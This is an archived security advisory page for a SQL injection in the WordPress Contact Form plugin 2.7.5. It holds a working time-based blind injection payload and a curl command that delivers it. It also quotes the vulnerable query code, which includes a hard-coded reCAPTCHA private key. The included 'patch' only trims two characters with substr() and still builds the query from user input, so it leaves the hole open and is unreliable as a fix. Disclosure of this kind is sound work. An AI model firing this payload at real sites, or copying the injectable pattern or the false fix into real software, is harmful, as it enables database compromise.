what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Contact Form 2.7.5 SQL Injection / Patch

WordPress Contact Form 2.7.5 SQL Injection / Patch
Posted Oct 14, 2011
Authored by Skraps

WordPress Contact Form plugin versions 2.7.5 and below suffer from a remote SQL injection vulnerability. A patch is included.

tags | exploit, remote, sql injection
SHA-256 | 9b07f455f6aee294073adabc402040fdad7b34b7d958d48990162aa3974e39f7
Download | Favorite | View

WordPress Contact Form 2.7.5 SQL Injection / Patch

Change Mirror Download
# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
# Version: 2.7.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php 
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1
 
---------------
Vulnerable code
---------------
Line 49:
    public function the_content($content) {
        global $wpdb;
        global $table_name;
        global $settings_table_name;

        $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

        if ($_POST['wpcf_easyform_submitted'] == 1) {

            $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

---------------
Patch
---------------

*** ./easy-form.class.php.orig  2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php  2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
          
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!         
!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
              
              $continue = true;
              
--- 54,63 ----
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
          
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!              $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); 
!             
!   $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
              
              $continue = true;
              
***************
*** 71,80 ****
              if ($continue) {
              
                  //loop through the fields of this form (read from DB) and build the message here
!                 $form_fields = $wpdb->get_results("
                SELECT *
                FROM $settings_table_name
!               WHERE form_id = ".$_POST['wpcf_easyform_formid']."
                ORDER BY position
              ");
              
--- 73,82 ----
              if ($continue) {
              
                  //loop through the fields of this form (read from DB) and build the message here
!     $form_fields = $wpdb->get_results("
                SELECT *
                FROM $settings_table_name
!               WHERE form_id = ".$wpcf_easyform_formid."
                ORDER BY position
              ");


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    13 Files
  • 31
    Aug 31st
    467 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close